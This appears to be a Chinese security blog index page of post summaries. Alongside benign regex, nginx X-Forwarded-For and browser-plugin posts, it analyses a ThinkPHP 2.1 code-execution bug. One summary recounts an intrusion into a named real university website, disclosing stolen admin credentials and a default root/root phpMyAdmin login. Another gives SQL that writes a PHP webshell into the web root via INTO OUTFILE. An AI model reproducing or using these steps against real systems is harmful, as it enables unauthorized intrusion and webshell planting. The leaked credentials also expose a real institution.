2014年4月1日
摘要:
thinkphp 2.1的版本我们来分析下漏洞吧官方发布了一个安全补丁表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。官方的补丁:/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']=”\2″;’, implode($depr,$paths));125 + $res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.' 阅读全文
摘要:
今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码账号:admin密码:abc123456但是,找来找去找不到后台,就让我提权试试。我看了下:http://pxc.ncist.edu.cn/dede/后台被删除了!怎么办??google hack也没找到后台后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin输入默认MySql账号与密码:账号:root密码:root居然进去了:接下来就是phpmyadmin提权了:我的思路是:1.先爆出php服务器www的路径2.然后通过将php一句话插入数据库再导出到www路径通过google 阅读全文
摘要:
php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('');SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xss,字段为xss1,导出到D:/www/x.php一句话连接密码:xiaoma方法二:Creat 阅读全文
摘要:
今天要简单讲一下Modify Headers这个Firefox插件,记录一下我是怎么使用它的。Modify Headers:https://addons.mozilla.org/zh-CN/firefox/addon/modify-headers/简单的说,这个插件的主要作用是对Firefox的HTTP request headers进行添加、修改和过滤等操作。当我们访问网站的时候,某些网站服务器会对访问网站的浏览器Header信息进行判断,然后决定用什么方式把网站内容呈现给浏览器。服务器也会根据浏览器的header中包含的其他信息(譬如浏览器所在的IP地址)判断是否要讲某一特定的信息呈现给浏 阅读全文
摘要:
如今利用nginx做负载均衡的实例已经很多了,针对不同的应用场合,还有很多需要注意的地方,本文要说的就是在通过CDN 后到达nginx做负载均衡时请求头中的X-Forwarded-For项到底发生了什么变化。下图为简单的web架构图:先来看一下X-Forwarded-For的定义:X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的详细介绍。标准格式如下:X-Forwarded-For: client1, p 阅读全文
摘要:
可以在 JScript 中使用正则表达式搜索字符串中的模式、替换文本以及提取子字符串。搜索以下 JScript 示例查找某个单词的所有匹配项。创建该正则表达式的语句为var re = /\w+/g;/\w+/模式指定匹配以下一个或多个任意字符:A-Z、a-z、0-9 和下划线字符。模式之后的g(全局)标志,指示搜索操作应查找该模式的所有匹配项,而不仅仅是第一个匹配项。还可以使用以下 JScript 替换语法。var re = new RegExp("\\w+", "g");要检索每个匹配项,exec 方法将从lastIndex位置继续搜索,直到返回 Nu 阅读全文
摘要:
“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。正则表达式可用作与要搜索的文本相比较的字符模式。正则表达式的结构与所创建的算术表达式的结构类似。较大的表达式可由小的表达式通过使用各种元字符和运算符进行组合而创建。正则表达式的各组成部分可以是单个字符、字符集、字符范围或在几个字符之间选择。也可以是这些组成部分的任意组合。构造正则表达式通过在一对分隔符之间放置表达式的各种组成部分,就可以构建正则表达式。在 JScript 中,分隔符是一对正斜杠 (/) 字符,如以下示例所示。/expression/正则表达式示例下表包含典型正则表达式的示例。正则表达式说明/^\s*$/匹配空行。/\d 阅读全文
摘要:
“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。该表达式可用作一个将字符模式与要搜索的字符串相匹配的模板。正则表达式包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为“元字符”)。特殊字符元字符下表包含了多字符元字符的列表以及它们在正则表达式中的行为。元字符行为示例\b与一个字边界匹配;即字与空格间的位置。er\b与“never”中的“er”匹配,但与“verb”中的“er”不匹配。\B非边界字匹配。er\B与“verb”中的“er”匹配,但与“never”中的“er”不匹配。\d数字字符匹配。等效于[0-9]。在搜索字符串“12 345”中,\d{2}与“12”和“34 阅读全文
摘要:
1、入门简介简单的说,正则表达式是一种可以用于模式匹配和替换的强有力的工具。我们可以在几乎所有的基于UNIX系统的工具中找到正则表达式的身影,例如,vi编辑器,Perl或PHP脚本语言,以及awk或sed shell程序等。此外,象JavaScript这种客户端的脚本语言也提供了对正则表达式的支持。由此可见,正则表达式已经超出了某种语言或某个系统的局限,成为人们广为接受的概念和功能。正则表达式可以让用户通过使用一系列的特殊字符构建匹配模式,然后把匹配模式与数据文件、程序输入以及WEB页面的表单输入等目标对象进行比较,根据比较对象中是否包含匹配模式,执行相应的程序。 举例来说,正则表达式的一个. 阅读全文